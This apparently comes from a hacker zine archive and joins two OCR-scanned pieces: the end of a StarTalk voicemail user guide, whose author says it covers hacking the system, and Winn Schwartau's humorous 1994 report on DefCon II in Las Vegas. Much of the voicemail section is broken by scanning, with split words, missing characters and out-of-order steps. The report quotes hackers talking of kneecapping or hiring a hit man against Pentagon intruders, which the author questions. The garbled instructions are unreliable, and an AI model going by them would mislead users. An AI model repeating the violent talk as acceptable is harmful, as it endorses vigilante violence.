in the Company Directory, At the tone, record your name. 

To end your recording, press # 

9. To accept your recording, press # 


mw wN EF 


(oe) 


You are now ready to record your personal mailbox greetings. Once your 
greetings are recorded, you have the option of selecting either your primary 
or alternate greeting. If you do not select a greeting, your primary 
greeting plays automatically. 
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Note: Initializing a mailbox is only done the first time you open your 
mailbox. You have to initialize your mailbox to receive messages. 


Your Mailbox Greeting 


Each mailbox has a primary and alternate greeting recorded by you. 
After you have recorded your personal mailbox greetings, you can choose 
which greeting you play to callers reaching your mailbox. 


Recording a Greeting 


To record your greetings, you must first open your mailbox. Once you have 
opened your mailbox: 


1. Press 8 

2. To select Greeting Options, press 2 

3. To record your greeting, press 1 

4. Select which greeting you are going to record. 

Note: You can choose to record either your primary or alternate mailbox 
greeting. 

To record your greeting, press 1 

At the tone, record your greeting. 

[To end your greeting, press # 

[To accept this recording, press # 


orydnnawuw 


Choosing a Mailbox Greeting 


After the mailbox greeting is recorded, you can choose which greeting you 
are going to use. If you do not choose a mailbox greeting, Startalk 
automatically plays your primary greeting. To choose a mailbox greeting 
you must open your mailbox. Once you have opened your mailbox: 


Press 8 

To select Greeting Options, press 2 

Press 2 

Select which mailbox greeting your mailbox is going to use. 


mwwDN EF 


Listening To Messages 


Each time you open your mailbox, StarTalk plays any Broadcast messages left 
by the System Admin (don’t reply to them!), and also tells you how many other 
messages are in your mailbox. Messages are played beginning with any Urgent 
messages, followed by the first message left in your mailbox. 


To listen to messages, you must open your mailbox. Once you have opened 
your mailbox: 


1. To listen to messages, press 2 or to listen to your saved messages, 
press 6 


Your first message starts to play. While listening to a message, or after 
a message has played, you can: 


Replay the message 

Back up 9 seconds 

Pause and Continue 
Forward 9 seconds 

Skip to the end of message 
Play the previous message 
Forward the message 

Skip to the next messag 
Play time and date stamp 
Save a Message 

Erase the messag 

Reply to the message 
Volume control 


to pause then 2 to continue 


3 


FOOTNIATNAOBWWNEF EF 
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messages left in your mailbox and exiting 


all messages you do not erase are automatically saved. 


Note: After listening to th 
StarTalk, 

Off-premise Message Notification 

Off-premise Message Notification, 


you when messages ar 
is enabled in the Stari 


to a telephone number or a pager, alerts 


Coordinator. 


Setting Up Off-premis 


ft in your mailbox. Off-premise Message Notification 
Talk Class of Service designation by the System 


Message Notification 


To set up Off-premis 
mailbox. 


mw wN EF 


Note: 


Open the mail 
Open th 


lbox admin menu, 


Message Notification, you must first open your 


Once you have opened your mailbox: 


press 8 


m 
To set up 
To select 


a 


ssag 

message notification, press 1 
li 

can 


notification menu, press 6 


ne, press 1 
also select 


line, pool or intercom. 


You 
(YOU HAVE 


TO S 


ELECT LINE) 


You 


Enter a line, 
Note: 
To accept the li 
Enter the destination t 
Note: 


have 


While you are entering a telephon 
number to represent dial 


When StarTalk 
outside line, 


example enter 9 to access a 
recognize dial 
and any required pauses. 
lephon 


Ne} 


Note: 
automatical 
type is sel 


To accept 


pool or IC number, press # 

to enter ’1’, or ’01’ as the line if 1 doesn’t work. 

ne, pool or IC number, press # 

lephone number, press # 

number, you can press a dialpad 
ltone recognition or other telephone number options. 


ltone press 2 followed by the destination number, 


is installed with PBX or Centrex and you want to access an 
you must enter the command to recognize dial tone. For 

n outside line, press # then enter 4 to 

press # 
Each pause entered is four seconds long. 


o end th 


To accept t 


t 
h 


number, press # 


[To change 
The 


the destination typ 
the destination type 
destination type can 
lly selects telephon 
lected, 


telephone number, press # 

telephone, press # and move to step 12. 

to pager, press 1 

b ither telephone or pager. 
When the pager destination 

be inserted. The number of pauses 


StarTalk 


a pause must 


required depends on the pager system being used. 


Hy W 


~] 


Note: 
WwW 
N 
urgent 
To acc 


19. 


Th 


Note: 


Enter th 
Note 


To accept the destination type, 
If the message destination 
Enter th 


im 


press # 
type is a telephone, you must set a start time. 


t 


This is a four-digit 
must be preceded by a zero. 
Press 1 for AM, 
To accept the start time, 


when Off-premise Message Notification is to start. 


field. Any single digit hour and minute 


2 for PM. 
press # 


t 


To accept t 


im 


This is a four-digit field. 
minute must be preceded by a zero. 
Press 1 for AM, 
To accept t 


ne 
nN 


when Off-premise Message Notification is to stop. 
Any single digit hour and 


2 for PM. 


stop time, press # 


message type NEW, press # 


[To change t 


Ge 
E 


EW to URG 


n 


The default message type is N 
henever you receiv 


NT. 


n 


message type to URGENT, press 1 
EW. This means you are notified 
a new messag Changing the message type changes 


This means you are only notified when you receive an 


message. 


pec 


message typ press # 


Ty 


is 


Disabling Off-premis 


Off-pr 
reached. 


mis 


M 


You will b 


ssage Notification will begin as soon as the start time 
called whenever you receive a messag 


Message Notification 


To disabl 


Off-premis 


Message Notification, you must first open your 
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mailbox, Once your mailbox is open: 


Open the mailbox admin menu, press 8 

To access the message notification menu, press 6 
[To listen to the options, press 2 

To disable message notification, press 1 


mwWDN FE 


Off-premise Message Notification is disabled. 


Changing Off-premise Message Notification 


To change Off-premise Message Notification, you must firs 
Once you have opened your mailbox: 


Open the mailbox admin menu, press 8 

Open the message notification menu, press 6 
To change message notification press 1 

[To select a line, press 1 

Press 1 

If you wish to change the line, press # 
Enter the new line number. 

To end the line number, press # 

To accept the line number, press # 

Press 1 


OB WN EF 


Ww On AD 


t open your mailbox, 


If you do not wish to change the destination telephon 
Enter the new destination telephone number. 

To end the telephone number, press # 
Oo accept the telephone number, press 
o change the destination type, press 
o accept the destination type, press 
fe) 
£ 


change the start time, press 1 
you do not wish to change the time, press # 


6. Enter the time when Off-premise Message Notification 
17. Press 1 for AM, 2 for PM. 

18. To accept the start time, press # 

9. To change the stop time, press 1 

If you do not wish to change the time, press # 

20. Enter the time when Off-premise Message Notification 
21. Press 1 for AM, 2 for PM. 
22. To accept the stop time, press # 
23. To change the message type, press 1 
24. To accept the message type, press # 


Leaving a Mailbox Message 


You can leave a message directly in any StarTalk mailbox, 
mailbox has been initialized. 


To leave a mailbox message: 


Enter the mailbox # and at the tone, record your messa 
To end your recording, press # 
For delivery options, press 3 
To send your message, press # 


Bw WN FE 


Message Delivery Options 


StarTalk provides you with four message delivery options, 


Certified 1 - This delivery option sends you a message an 
the person received and read your message, 
fe) 


nly if the message is inside the system. 


Urgent 2 - This delivery option marks the message, and 
playing other messages left in your mailbox 


Private 3 - This delivery option prevents a message fro 
to another mailbox. 


number, press # 


is to start. 


is to stop. 


as long as that 


ge. 


which are: 
d tells you if 
but this is 


plays it before 


m being forwarded 
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Normal # — This delivery option sends a message to a mailbox. Normal 
messages are played in the order in which they are received, 
and can be forwarded to other mailboxes. 


After you have recorded your mailbox message, press 3 to access delivery 
options. To use one of the delivery options, press the right delivery 
option number. 


Note: When leaving a message, you can press 9 to listen to StarTalk voice 
prompts in the alternate language. 


Assigning the Target Attendant 


Anyone that presses [0] when they are connected to your box will be 
transferred to an operator if your Target Attendant is set to [0] or her 
mailbox #. 


To change from the Operator to the Target Attendant - 


1. Press 8 
2. Press 5 
3. Press 1 
4. Enter <desired extension> 
5. Press * 


Quick Reference Tips 


-— To save time, you can just interrupt most prompts by press # or selecting 
a StarTalk option. 


- If you get lost using StarTalk options, press * to replay the option list 


VVV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV VV 


Ok, this is the end of the StarTalk voice mail guide. I tried my best 
to make it as simple as I could with respect to both hacking it 

and using it. I plan on writing my next file on Smooth Operator, a 
PC-based information processing system. I will probably focus more on 
the terminal part of it. I will try and cover the logins and all other 
things needed to get around the system. If any readers out there have 
comments or suggestions on this article, or on my next article, please 
contact me. 


If you would like to talk about this, you can find me on IRC with the nick 
‘’redskull’ or you can write me a message on my Internet Address. 
Internet Address : redskull@io.org 


I’d like to thank S. Cleft for giving me some tips and also discovering 
some of the things I’ve mentioned in this file. 


Na ND NEE NAPA ANE N NAN RENAE NAN NSA VE NMEY ANE NC NRN NEN, PVE VENLNE NADY SNE NNR. NEN APN AVE NINE NADY SNE NNN NEN VSP NEN MSA BD 
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DefCon II: Las Vegas 
Cyber-Christ meets Lady Luck 
July 22-24, 1994 
by Winn Schwartau 


(C) 1994 


Las Vegas connotes radically different images to radically dif\037 


ferent folks. The Rat Pack of Sinatra, Dean Martin and Sammy 
Davis Jr. elicits up the glistening self-indulgent imagery of 
Vegas’ neon organized crime in the '’50’s (Ocean’s Eleven 


displayed only minor hacking skills.) 


Then there’s the daily bus loads of elderly nickel slot gam\037 
blers from Los Angeles and Palm Springs who have nothing better 
to do for twenty out of twenty four hours each day. (Their 
dead husbands were golf hacks.) Midwesterners now throng to 
the Mississippi River for cheap gambling. 


Recreational vehicles of semi-trailor length from East Bullock, 
Montana and Euclid, Oklahoma and Benign, Ohio clog routes 8:0 
and 40 and 10 to descend with a vengeance upon an asphalt home 
away from home in the parking lot of Circus Circus. By cul\037 
tural demand, every Rv’er worth his salt must, at least once in 
his life, indulge in the depravity of Glitter Gulch. 


And so they come, compelled by the invisibly insidious derelict 
attraction of a desert Mecca whose only purpose in life is to 
suck the available cash from addicted visitor’s electronic 
purses of ATM and VISA cards. (Hacker? Nah... .) 


Vegas also has the distinction of being home to the largest of 
the largest conventions and exhibitions in the world. Comdex 

is the world’s largest computer convention where 150,000 techno- 
dweebs and silk suited glib techno-marketers display their 
wares to a public who is still paying off the 20% per annum 
debt on last year’s greatest new electronic gismo which is 
now rendered thoroughly obsolete. And the Vegas Consumer Elec\037 
tronic Show does for consumer electronics what the First Amend\037 
ment does for pornography. (Hackers, are we getting close?) 


In between, hundreds upon hundreds of small conferences and 
conventions and sales meetings and annual excuses for excess 
all select Las Vegas as the ultimate host city. Whatever you 
want, no matter how decadent, blasphemous, illegal or immoral, at 
any hour, is yours for the asking, if you have cash or a_ clean 
piece of plastic. 


So, it comes as no surprise, that sooner or later, (and it turns 
out to be sooner) that the hackers of the world, the computer 
hackers, phone phreaks, cyber-spooks, Information Warriors, data 
bankers, Cyber-punks, Cypher-punks, eavesdroppers, chippers, 
virus writers and perhaps the occasional Cyber Christ again 
picked Las Vegas as the 1994 site for DefCon II. 


You see, hackers are lik veryon ls (sort of) and so they, 
too, decided that their community was also entitled to hold 
conferences and conventions. 
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DefCon (as opposed to Xmas’s HoHoCon), is the premier mid-year 
hacker extravaganza. Indulgence gone wild, Vegas notwithstanding 
if previous Cons are any example; but now put a few hundred 
techno-anarchists together in sin city USA, stir in liberal 
doses of illicit controlled pharmaceutical substances, and we 
have a party that Hunter Thompson would be proud to attend. 


All the while, as this anarchistic renegade regiment marches to 

he tune of a 24 hour city, they are under complete surveillance 

f the authorities. Authorities like the FBI, the Secret Serv\037 
ce, telephone security . . . maybe even Interpol. And how did 

he "man" arrive in tow behind the techno-slovens that belong 
ehind bars? 


t 
fe) 
a 
1s 
b 


They were invited. 


And so was I. Invited to speak. (Loose translation for standing 
up in front of hundreds of hackers and being verbally skewered 
for having an opinion not in 100% accordance with their own.) 


"C’mon, it’ll be fun," I was assured by DefCon’s organizer, the 
Dark Tangent. 


"Sure fired way to become mutilated monkey meat," I responded. 
Some hackers just can’t take a joke, especially after a prison 
sentence and no opposite-sex sex. 


"No really, they want to talk to you..." 
"T bet." 


It’s not that I dislike hackers - on the contrary. I have even 
let a few into my home to play with my kids. It’s just that, so 
many of the antics that hackers have precipitated at other Cons 
hav arned them a reputation of disdain by all, save those who 
remember their own non-technical adolescent shenanigans. And I 
guess I’m no different. I’ve heard the tales of depraved indif\037 
ference, hotel hold-ups, government raids on folks with names 
Similar to those who are wanted for pushing the wrong key on the 
keyboard and getting caught for it. I wanted to see teens and X- 
generation types with their eyes so star sapphire glazed over that 
I could trade them for chips at the craps table. 


Does the truth live up to the fiction? God, I hope so. It’d be 
downright awful and unAmerican if 500 crazed hackers didn’t get 
into at least some serious trouble. 


So I go to Vegas because, because, well, it’s gonna be fun. And, 
if I’m lucky, I might even see an alien spaceship. 


For you see, the party has already begun. 


I go to about 30 conventions and conferences a year, but rarely 
if ever am I so Tylonol and Aphrin dosed that I decide to go with 
a severe head cold. Sympomatic relief notwithstanding I debated 
and debated, and since my entire family was down with the same 
ailment I figured Vegas was as good a place to be as at home in 
bed. If I could survive the four and half hour plane flight 
without my Eustahian tubes rocketing through my ear drums and 
causing irreparable damage, I had it made. 


The flight was made tolerable becuase I scuba dive. Every few 
minutes I drowned out the drone of the engines by honking uncon\037 
trollably like Felix Ungerto without his aspirator. To the 
chagrin of my outspoken counter surveillance expert and traveling 
mate, Mike Peros and the rest of the first class cabin, the 
captain reluctantly allowed be to remain on the flight and not be 
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expelled sans parachute somewhere over Southfork, Texas. Snort, 
snort. Due to extensive flirting with the two ladies across the 
aisle, we made the two thousand mile trek in something less than 

34 minutes... or so it seemed. Time flies took on new mean\037 
ing. 


For those who don’t know, the Sahara Hotel is the dregs of the 
Strip: We were not destined for Caesar’s or the MGM or any of 
the new multi-gazillion dollar hotel cum casinos which produce 
pedestrian stopping extravaganzas as an inducement to suck in 
little old ladies to pour endless rolls of Washington quarters in 
mechanical bottomless pits. The Sahara was built some 200 years 
ago by native slave labor whose idea of plumbing is clean sand 
and decorators more concerned with a mention in Mud Hut Daily 
than Architectural Digest. It was just as depressingly dingy and 
solicitly low class as it was when I forced to spend eleven days 
there (also with a killer case of the flu) for an extended Comdex 
computer show. But, hey, for a hacker show, it was top flight. 


"What hackers?" The desk clerk said when I asked about the show. 


I explained. Computer hackers: the best from all over the coun\037 


try. "I hear even Cyber Christ himself might appear." 

Her quizzical look emphasized her pause. Better to ignore a 
question not understood than to look stupid. "Oh, they’ll be 
fine, We hav xcellent security." The security people, I found 
out shortly thereafter knew even less: "What’s a hacker?" Too 
much desert sun takes its toll. Proof positive photons are bad 


for neurons. 


Since it was still only 9PM Mike and I sucked down a couple of $1 
Heinekens in the casino and fought it out with Lineman’s Switch\037 
ing Union representatives who were also having their convention 

at the Sahara. Good taste in hotels goes a long way. 


"$70,000 a year to turn a light from red to green?" we com\037 
plained. 
"It’s a tension filled job . . .and the overtime is murder." 


"Why a union?" 

"To protect our rights." 

"What rights?" 

"To make sure we don’t get replaced by a computer 


"Yeah," I agreed. "That would be sad. No more Amtrak 
disasters." The crowd got ugly so we made a hasty retreat under 
the scrutiny of casino security to our rooms. Saved. 


Perhaps if I noticed or had read the original propaganda on 
DefCon, I might have known that nothing significant was going to 
take place until the following (Friday) evening I might have 
missed all the fun. 


For at around 8AM, my congestion filled cavities and throbbing 
head was awakened by the sound of an exploding toilet. It’s kind 
of hard to explain what this sounds like. Imagine a toilet 
flushing through a three megawatt sound system at a Rolling 
Stones concert. Add to that the sound of a hundred thousand flu 
victims standing in an echo chamber cleansng their sinuses into a 
mountain of Kleenex while three dozen football referees blow 
their foul whistles in unison, and you still won’t come close to 
the sheer cacophonous volume that my Saharan toilet exuded from 
within its bowels. And all for my benefit. 
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The hotel manager thought I was kidding. "What do you mean 
exploded?" 


"Which word do you not understand?" I growled in my early morning 
sub-sonic voice. "If you don’t care, I don’t." 


My bed was floating. Three or maybe 12 inches of water created 
the damnedest little tidal wave I’d ever seen, and the sight and 
sound of Lake Meade in room 1487 only exascerbatd the pressing 


need to relieve myself. I dried my feet on the extra bed linens, 
worried about electrocution and fell back asleep. It could have 
been 3 minutes or three hours later - I have no way to know - 


but my hypnogoic state was rudely interrupted by hotel mainte\037 
nance pounding at the door with three fully operational muffler- 
less jack hammers. 


"IT can’t open it," I bellowed over the continual roar of my 
personal Vesuvius Waterfall. "Just c’mon in." The fourteenth 
floor hallway had to resemble an underwater coral display becuase 


the door opened ever so slowly.. 
"Holy Christ!" 
Choking back what would have been a painful laugh, I somehow 


eeked out the words, with a smirk, "Now you know what an explo- 
ding toilet is like." 


For, I swear, the next two hours three men whose English was 
worse than a dead Armadillo attempted to suck up the Nile River 
from my room and the hallway. Until that very moment in time, I 
didn’t know that hotels were outfitted with vacuum cleaners 
specifically designed to vacuum water. Perhaps this is a regular 
event. 


Everyone who has ever suffered through one bitches about Vegas 
buffets, and ven the hackers steered away from the Sahara’s 
$1.95 "all you can eat" room: "The Sahara’s buffet is the worst 
in town; worse than Circus Circus." But since I had left my 
taste buds at 37,000 feet along with schrapneled pieces of my 
inner ear, I sought out sustenance only to keep me alive another 
24 hours. 


By mid afternoon, I had convinced myself that outside was not the 
place to be. After only eighteen minutes of 120 sidewalk egg- 
cooking degrees, the hot desert winds took what was left of my 
breath away and with no functioning airways as it was, I knew 
this was a big mistake. So, hacker convention, ready or not, 
here I come. 


Now, you have to keep in mind that Las Vegas floor plans are 
designed with a singular purpose in mind. No matter where you 
need to go, from Point A to Point B or Point C or D or anywhere, 
the traffic control regulations mandated by the local police and 
banks require that you walk by a minimum of 4,350 slot machines, 
187 gaming tables of various persuasions and no less than 17 
bars. Have they no remorse? Madison Avenue ad execs take heed! 


So, lest I spend the next 40 years of my life in circular pursuit 
of a sign-less hacker convention losing every last farthing I 
inherited from dead Englishmen, I asked for the well hidden loca- 
tion at the hotel lobby. 


"What hackers?" There goes that nasty photon triggered neuron 
depletion again. 


"The computer hackers." 
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"What computer hackers. We don’t have no stinking hackers 
Desk clerk humor, my oxymoron for the week. 


I tried the name: DefCon II. 


"Are we going to war?" one ex-military Uzi-wielding guard said 
recognizing the etymology of the term. 


"Yesh, it’s true" I used my most convincing tone. "The Khasaks\037 
tanis are coming with nuclear tipped lances riding hundred foot 
tall horses. Paris has already fallen. Berlin is in ruins. 


Aren’t you on the list to defend this great land?" 


"Sure as shit am!" He scampered off to the nearest phone in an 
effort to be the first on the front lines. Neuron deficiency 
beyong surgical repair.. 


I slithered down umpteen hallways and casino aisles lost in the 
jungle of jingling change. Where the hell are the hackers? 
"They must be there," another neuron-impoverished Saharan employ\037 
ee said as he pointed towards a set of escalators at the very far 
end of the casino. 


All the way at the end of the almost 1/4 mile trek through Sodom 
and Gonorrhea an ’up’ escalator promised to take me to hackerdom. 
Saved at last. Upstairs. A conference looking area. No- signs 
anywhere, save one of those little black Velcro-like stick-em 
signs where you can press on white block letters. 


No Mo Feds 


I must be getting close. Aha, a maintenance person; I’1l ask him. 
"What hackers? What’s DefCon." 


Back downstairs, through the casino, to the front desk, back 
through the casino, up the same escalator again. Room One I was 
told. Room One was empty. Figures. But, at the end of a 
hallway, past the men’s room and the phones, and around behind 
Room One I saw what I was looking for: a couple of dozen T-shirt\037 
ed, Seattle grunged out kids (read: under 30) sitting at uncov\037 
ered six foot folding tables hawking their DefCon II clothing, 
sucking on Heinekens and amusing themselves with widely strewn 
backpacks and computers and cell phones. 


I had arrived! 


x kK kK * 


You know, regular old suit and tie conferences could learn a 
thing or two from Jeff Moss, the man behind DefCon II. No fancy 
badge making equipment; no $75 per hour union labor built regis\037 
tration desks; no big signs proclaiming the wealth of knowledge 
to be gained by signing up early. Just a couple of kids with a 
sheet of paper anda laptop. 


It turned out I was expected. They handed me my badge and what a 
badge it was. I’m color blind, but this badge put any psychedel\037 
ically induced spectral display to shame. In fact it was a close 
match to the Sahara’s mid 60’s tasteless casino carpeting which 

is so chosen as to hide the most disgusting regurgative blessing. 
But better and classier. 


The neat thing was, you could (in fact had to) fill out your own 
badge once your name was crossed off the piece of paper that 
represented the attend list. 


Name: 


19.txt Wed Apr 26 09:43:41 2017 6 
Subject of Interest: 


E-Mail: 

Fill it out any way you want. Real name, fake name, alias, 
handle - it really doesn’t matter cause the hacker underground 
ethic encourages anonymity. "We’d rather not know who you are 


anyway, unless you’re a Fed. Are you a Fed?" 


A couple of lucky hackers wore the ultimate badge of honor. An 

"I Spotted A Fed" T-shirt. This elite group sat or lay on the 
ground watching and scouring the registration area for signs that 
someone, anyone, was a Fed. They really didn’t care or not if 
you were a Fed they wanted the fr T-shirt and the peer re\037 
spect that it brought. 


I’m over 30 (OK, over 35) and more than a few times (OK, a little 
over 40) I had to vehemently deny being a Fed. Finally Jeff Moss 
came to the rescue. 


"He’s not a Fed. He’s a security guy and a writer." 


"Ugh! That’s worse. Can I get a T-shirt cause he’s a writer?" 
No way hacker-breath. 


Jeff. Jeff Moss. Not what I expected. I went to school with a 
thousand Jeff Mosses. While I had hair down to my waist, wearing 
paisley leather fringe jackets and striped bell bottoms so wide I 
appeared to be standing on two inverted ice cream cones, the Jeff 
Mosses of the world kept their parents proud. Short, short 
cropped hair, acceented by an ashen pall and clothes I still 
wouldn’t wear today. They could get away with anything cause 
they didn’t look the part of radical chic. Jeff, I really like 
Jeff: he doesn’t look like what he represents. Bruce Edelstein, 
(now of HP fame) used to work for me. He was hipper than hip but 
looked squarer than square. Now today that doesn’t mean as much 
as it used to, but we ex-30-somethings have a hard time forget\037 
ting what rebellion was about. (I was suspended 17 times in the 
first semester of 10th grade for wearing jeans.) 


Jeff would fit into a Corporate Board Meeting if he wore the 
right suit and uttered the right eloquencies: Yes, that’s it: A 
young Tom Hanks. Right. I used to hate Tom Hanks (Splash, how 
fucking stupid except for the TV-picture tube splitting squeals) 
but I’ve come to respect the hell out of him as an actor. Jeff 
never had to pass through that first phase. I instantly liked 
him and certainly respect his ability to pull off a full fledged 
conference for only $5000. 


You read right. Five grand and off to Vegas with 300 of your 
closest personal friends, Feds in tow, for a weekend of electron\037 


ic debauchery. "A few hundred for the brochure, a few hundred 
hear, a ton in phone bills, yeah, about $5000 if no one does’ any 
damage." Big time security shows cost $200,000 and up. I can 


honestly say without meaning anything pejorative at any of my 
friends and busienss acquaintances, that I do not learn 40 times 
as much at the ’real’ shows. Something is definitely out of 
whack here. Suits want to see suits. Suits want to see fancy. 
Suits want to see form, substance be damned. Suits should take a 
lesson from my friend Jeff. 


kK kK kK kK Ok 


I again suffered through a tasteless Saharan buffer dinner which 
cost me a whopping $7.95. I hate grits - buttered sand is what I 


call them - but in this case might well hav been preferabl 
Somehow I coerced a few hackers to join me in the ritualistic 
slaughter of our taste buds and torture of our intestines. They 


were not pleased with my choice of dining, but then who gives a 
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shit? I couldn’t taste anything anyway. Tough. 


To keep our minds off of the food we talked about something much 
more pleasant: the recent round of attacks on Pentagon computers 
and networks. "Are the same people involved as in the sniffing 
attacks earlier this year?" I asked my triad of dinner mates. 


"Indubitably." 


"And what’s the reaction from the underground - other hackers?" 


Coughs, sniffs. Derisive visual feedback. Sneers. The finger. 
"We can’t stand ’em. They’re making it bad for everybody." Two 
fingers. 


By and large the DefCon II hackers are what I call ’good hackers’ 
who hack, and maybe crack some systems upon occasion, but aren’t 
what I refer to as Information Warriors in the bad sense of the 
word. This group claimed to extol the same position as most of 
the underground would: the Pentagon sniffing crackers - or 
whoever who is assaulting thousands of computers on the net - 
must be stopped. 


"Scum bags, that what they are." I asked that they not sugarcoat 
their feelings on my behalf. I can take it. "These fuckers are 
beyond belief; they’re mean and don’t give a shit how much damage 
they do." We played with our food only to indulge in the single 
most palatable edible on display: ice cream with gobs of choco\037 
late syrup with a side of coffee. 


The big question was, what to do? The authorities are certainly 
looking for a legal response; perhaps another Mitnick or Phiber 
Optik. Much of the underground cheered when Mark Abene and 
others from the reknowned Masters of Destruction went to spend a 
vacation at the expense of the Feds. The MoD was up to no good 
and despit Abene’s cries that there was no such thing as_ the 
MoD, he lost and was put away. However many hackers believe as I 


do, that sending Phiber to jail for hacking was the wrong punish\037 
ment. Jail time won’t solve anything nor cure a hacker from his 
first love. One might as well try to cure a hungry man from 
eating: No, Mark did wrong, but sending him to jail was wrong, 
Coos, The Feds and local computer cops and the courts have to 
come up with punishments appropriate to the crime. Cyber-crimes 


(or cyber-errors) should not be rewarded by a trip to an all male 
hotel where the favorite toy is a phallically carved bar of soap. 


On the other hand, hackers in general are so incensed over th 
recent swell of headline grabbing break-ins, and law enforcement 
has thus far appeared to be impotent, ("These guys are good.") 
that many are searching for alternative means of retribution. 


"An IRA style knee capping is in order," said one. 


"That’s not good enough, not enough pain," chimed in another. 
(Sip, sip. I can almost taste the coffee.) 


"Are you guys serious?" I asked. Violence? You? I thought I 
knew them better than that. I know a lot of hackers, none that I 
know of is violent, and this extreme Pensacola retribution 
attitude seemed tottally out of character. "You really wouldn’t 

do that, would you?" My dinner companions were so upset and they 
claimed to echo the sentiment of all good-hackers in good stand\037 
ing, that yes, this was a viable consideration. 


The Feds aren’t doing it, so what choice do we have? I’ve heard 
talk about taking up a collection to pay for a hit man . ; oN 
Laughter around, but nervous laughter. 
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"You wouldn’t. . ." I insisted. 


"Well, probably not us, but that doesn’t mean someone else 
doesn’t won’t do it." 


"So you know who’s behind this whole thing." 


"Fucking-A we do," said yet another hacker chomping at the bit. 
He was obviously envisioning himself with a baseball bat in his 
hand. 


"So do the Feds." 


So now I find myself in the dilemma of publishing the open secret 
of who’s behind the Internet sniffing and Pentagon break ins, but 
after talking to people from both the underground and law en\037 
forcement, I think I’1l hold off awhile It serves no immediate 
purpose other than to warn off the offenders, and none of us want 
that. 


Obviously all is not well in hacker-dom. 


kK kK kK kK Ok 


The registration area was beyond full; computers, backpacks 
everywhere, hundreds of what I have to refer to as kids and a 
fair number of above ground security people. Padgett Peterson of 
Martin Marietta was going to talk about viruses, Sara Gordon on 
privacy, Mark Aldrich is a security guy from DC., and a bunch of 
other folks I see on the seemingly endless security trade show 
circuit. Jeff Moss had marketed himself and the show excellently. 
Los Angeles sent a TV crew, John Markoff from the New York Times 
popped in as did a writer from Business Week. (And of course, 
yours truly.) 


Of the 360 registrees ("Plus whoever snuck in," added Jeff) I 
guess about 20% were so-called legitimate security people. That’s 
not to belittle the mid-20’s folks who came not because they wer 
hackers, but because they like computers. Period. They hack for 
themselves and not on other systems, but DefCon II offered some\037 
thing for everyone. 


I remember 25 years ago how my parents hated the way I dressed 
for school or concerts or just to hang out: God forbid! We wore 
those damned jeans and T-shirts and sneakers or boots! "Why can’t 
you dress like a human being," my mother admonished me day after 
day, year after year. So I had to check myself because I can’t 
relate to Seattle grunge-ware. I’m just too damned old to wear 
shirts that fit like kilts or sequin crusted S&M leather straps. 
Other than the visual cacophony of dress, every single 
hacker/phreak that I met exceeded my expectations in the area of 
deportment. 


These are not wild kids on a rampage. The stories of drug-in\037 
duced frenzies and peeing in the hallways and tossing entire 
rooms of furniture out of the window that emanated from the 
HoHoCons seemed a million miles away. This was admittedly an 
opportunity to party, but not to excess. There was work to. be 
done, lessons to be learned and new friends to make. So getting 
snot nosed drunk or ripped to the tits or Ecstatically high was 
just not part of the equation. Not here. 


Now Vegas offers something quite distinct from other cities 
which host security or other conventions. At a Hyatt or a Hilton 
or any other fancy-ass over priced hotel, beers run $4 or $5 a 
crack plus you’re expected to tip the black tied minimum wage 
worker for popping the top. The Sahara (for all of the other 
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indignities we had to suffer) somewhat redeemed itself by offer\037 
ing an infinite supply of $1 Heinekens. Despite hundreds of beer 
bottle spread around the huge conference area (the hotel was 
definitely stingy in the garbage pail business) public drunken\037 
ness was totally absent. Party yes. Out of control? No way. 
Kudos! 


Surprisingly, a fair number of women (girls) attended. A handful 
were there ’for the ride’ but others . . . whoa! they know their 
shit. 


I hope that’s not sexist; merely an observation. I run across so 
few technically fluent ladies it’s just a gut reaction. I wish 
ther were more. In a former life, I owned a TV/Record produc\037 
tion company called Nashville North. We specialized in country 
rock taking advantage of the Urban Cowboy fad in the late 1970's. 
Our crew of producers and engineers consisted of the "Nashville 
Angels." And boy what a ruckus they would cause when we recorded 
Charlie Daniels or Hank Williams: they were stunning. Susan 
produced and was a double for Jacqueline Smith; we called Sally 
"Sabrina" because of her boyish appearance and resemblance to 
Kate Jackson. A super engineer. And there was Rubia Bomba, the 
Blond Bombshell, Sherra, who I eventually married: she knew 
country music inside and out - after all she came from Nashville 
in the first place. 


When we would be scheduled to record an act for live radio, some 
huge famous country act like Asleep at The Wheel of Merle Haggard 
or Johnny Paycheck or Vassar Clements, she would wince in disbe\037 


lief when we cried, "who’s that?" Needless to say, she knew the 
songs, the cues and the words. They all sounded alike. Country 
Music? Ecch. (So I learned.) 

At any rate, ladies, we’re equal opportunity offenders. C’mon 


down and let’s get technical. 


As the throngs pressed to register, I saw an old friend, Erik 


Bloodaxe. I’ve known him for several years now and he’s even 
come over to baby sit the kids when he’s in town. (Good prac\037 
tice.) Erik is about as famous as they come in the world of 
hackers. Above ground the authorities investigated him for his 


alleged participation in cyber crimes: after all, he was one of 
the founders of the Legion of Doom, and so, by default, he must 
have done something wrong. Never prosecuted, Erik Bloodaxe lives 

in infamy amongst his peers. To belay any naysayers, Erik ap\037 
peared on every single T-shirt there. 


"I Only Hack For Money," 
Erik Bloodaxe 


proclaimed dozens of shirts wandering through the surveillance 
laden casinos. His is a name that will live in infamy. 


So I yelled out, "Hey Chris!" He gave his net-name to the 
desk/table registrar. "Erik Bloodaxe." 


"Erik Bloodaxe?" piped up an excited high pitched male voice. 
"Where?" People pointed at Chris who was about to be embarrass\037 
ingly amused by sweet little tubby Novocain who practically bowed 

at Chris’s feet in reverence. "You’re Erik Bloodaxe?" Novocain 
said with nervous awe - eyes gleaming up at Chris’s ruddy skin 
and blond pony-tail. 


"Yeah," Chris said in the most off handed way possible. For 
people who don’t know him this might be interpreted as arrogance 
(and yes there is that) but he also has trouble publicly accept\037 
ing the fame and respect that his endearing next-generation 
teenage fans pour on him. 
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"Wow!" Novocain said with elegance and panache. "You’re Erik 
Bloodaxe." We’d just been through that said Chris’s eyes. 
"Yeah." 

"Wow, well, um, Te ee es ee ST Sep ee AOU S ws PS I mean, wow, 
you’re the best." What does Sylvia Jane Miller from Rumpsteer, 
Iowa say to a movie star? This about covered it. The Midwest 
meets Madonna. "Wow!" Only here it’s Novocain meets Cyber 


Christ himself. 


Like any other security show or conference or convention there is 
a kickoff, generally with a speech. And DefCon II was no excep\037 
tion. Except. 


Most conventional conventions (ConCons) start at 7:30 or 8:00 AM 
because, well, I don’t know exactly why, except that’s when so- 
called suits are expected to show up in their cubicles. Def\037 
Con, on the other hand, was scheduled to start at 10PM on Friday 
night when most hakcers show up for work. Most everyone had 
